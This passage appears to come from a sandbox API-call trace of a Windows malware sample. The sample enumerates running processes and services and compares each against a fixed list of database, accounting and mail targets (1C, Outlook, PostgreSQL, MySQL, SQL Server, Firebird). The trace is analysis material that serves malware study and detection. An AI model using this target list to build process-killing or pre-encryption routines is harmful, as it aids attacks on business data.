lpString2="winlogon.exe") returned -1 [0266.202] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0266.203] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0266.203] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0266.203] lstrlenW (lpString="services.exe") returned 12 [0266.203] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0266.203] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0266.203] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0266.203] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0266.203] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0266.203] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0266.203] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0266.203] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0266.203] lstrlenW (lpString="lsass.exe") returned 9 [0266.203] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0266.203] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0266.203] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0266.203] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0266.203] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0266.203] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0266.203] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0266.203] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0266.204] lstrlenW (lpString="lsm.exe") returned 7 [0266.204] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0266.204] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0266.204] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0266.204] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0266.204] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0266.204] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0266.204] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0266.204] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.204] lstrlenW (lpString="svchost.exe") returned 11 [0266.204] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.204] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.204] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.204] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.204] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.204] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.204] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.204] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.205] lstrlenW (lpString="svchost.exe") returned 11 [0266.205] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.205] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.205] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.205] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.205] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.205] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.205] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.205] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.205] lstrlenW (lpString="svchost.exe") returned 11 [0266.205] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.205] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.205] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.205] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.205] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.205] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.205] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.205] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.206] lstrlenW (lpString="svchost.exe") returned 11 [0266.206] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.206] lstrlenW (lpString="svchost.exe") returned 11 [0266.206] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0266.206] lstrlenW (lpString="audiodg.exe") returned 11 [0266.206] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.207] lstrlenW (lpString="svchost.exe") returned 11 [0266.207] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.207] lstrlenW (lpString="svchost.exe") returned 11 [0266.207] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0266.207] lstrlenW (lpString="userinit.exe") returned 12 [0266.207] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0266.208] lstrlenW (lpString="dwm.exe") returned 7 [0266.208] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0266.208] lstrlenW (lpString="explorer.exe") returned 12 [0266.208] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0266.208] lstrlenW (lpString="spoolsv.exe") returned 11 [0266.208] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0266.209] lstrlenW (lpString="taskhost.exe") returned 12 [0266.209] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.209] lstrlenW (lpString="svchost.exe") returned 11 [0266.209] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0266.209] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0266.209] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0266.209] lstrlenW (lpString="reader_sl.exe") returned 13 [0266.209] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0266.210] CloseHandle (hObject=0x3c4) returned 1 [0266.210] Sleep (dwMilliseconds=0x1f4) [0266.934] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea218 [0267.108] EnumServicesStatusExW (in: hSCManager=0x47ea218, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0267.109] GetLastError () returned 0xea [0267.109] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xd68) returned 0x3dec5a0 [0267.109] EnumServicesStatusExW (in: hSCManager=0x47ea218, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xd68, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0267.109] CloseServiceHandle (hSCObject=0x47ea218) returned 1 [0267.109] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0267.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0267.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0267.109] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0267.109] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0267.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0267.109] lstrlenW (lpString="AudioSrv") returned 8 [0267.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0267.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0267.110] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0267.110] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0267.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0267.110] lstrlenW (lpString="BFE") returned 3 [0267.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0267.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0267.110] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0267.110] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0267.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0267.110] lstrlenW (lpString="CryptSvc") returned 8 [0267.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0267.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0267.110] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0267.110] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0267.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0267.110] lstrlenW (lpString="CscService") returned 10 [0267.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0267.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0267.110] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0267.110] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0267.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0267.110] lstrlenW (lpString="DcomLaunch") returned 10 [0267.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0267.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0267.110] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0267.110] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0267.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0267.110] lstrlenW (lpString="Dhcp") returned 4 [0267.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0267.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0267.110] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0267.111] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0267.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0267.111] lstrlenW (lpString="Dnscache") returned 8 [0267.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0267.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0267.111] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0267.111] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0267.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0267.111] lstrlenW (lpString="DPS") returned 3 [0267.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0267.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0267.111] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0267.111] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0267.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0267.111] lstrlenW (lpString="eventlog") returned 8 [0267.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0267.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0267.111] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0267.111] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0267.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0267.111] lstrlenW (lpString="EventSystem") returned 11 [0267.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0267.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0267.111] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0267.111] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0267.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0267.111] lstrlenW (lpString="gpsvc") returned 5 [0267.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0267.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0267.111] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0267.111] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0267.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0267.111] lstrlenW (lpString="LanmanWorkstation") returned 17 [0267.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0267.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0267.112] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0267.112] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0267.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0267.112] lstrlenW (lpString="lmhosts") returned 7 [0267.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0267.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0267.112] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0267.112] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0267.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0267.112] lstrlenW (lpString="MMCSS") returned 5 [0267.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0267.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0267.112] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0267.112] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0267.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0267.112] lstrlenW (lpString="MpsSvc") returned 6 [0267.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0267.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0267.112] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0267.112] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0267.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0267.112] lstrlenW (lpString="NlaSvc") returned 6 [0267.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0267.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0267.112] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0267.112] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0267.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0267.112] lstrlenW (lpString="nsi") returned 3 [0267.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0267.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0267.112] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0267.113] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0267.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0267.113] lstrlenW (lpString="PcaSvc") returned 6 [0267.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0267.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0267.113] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0267.113] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0267.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0267.113] lstrlenW (lpString="PlugPlay") returned 8 [0267.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0267.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0267.113] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0267.113] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0267.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0267.113] lstrlenW (lpString="Power") returned 5 [0267.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0267.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0267.113] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0267.113] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0267.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0267.113] lstrlenW (lpString="ProfSvc") returned 7 [0267.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0267.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0267.113] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0267.113] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0267.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0267.113] lstrlenW (lpString="RpcEptMapper") returned 12 [0267.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0267.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0267.113] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0267.113] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0267.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0267.114] lstrlenW (lpString="RpcSs") returned 5 [0267.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0267.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0267.114] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0267.114] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0267.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0267.114] lstrlenW (lpString="SamSs") returned 5 [0267.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0267.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0267.114] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0267.114] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0267.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0267.114] lstrlenW (lpString="Schedule") returned 8 [0267.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0267.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0267.114] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0267.114] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0267.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0267.114] lstrlenW (lpString="SENS") returned 4 [0267.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0267.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0267.114] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0267.114] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0267.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0267.114] lstrlenW (lpString="ShellHWDetection") returned 16 [0267.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0267.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0267.114] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0267.114] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0267.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0267.114] lstrlenW (lpString="Spooler") returned 7 [0267.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0267.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0267.114] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0267.115] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0267.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0267.115] lstrlenW (lpString="SysMain") returned 7 [0267.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0267.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0267.115] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0267.115] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0267.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0267.115] lstrlenW (lpString="Themes") returned 6 [0267.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0267.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0267.115] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0267.115] 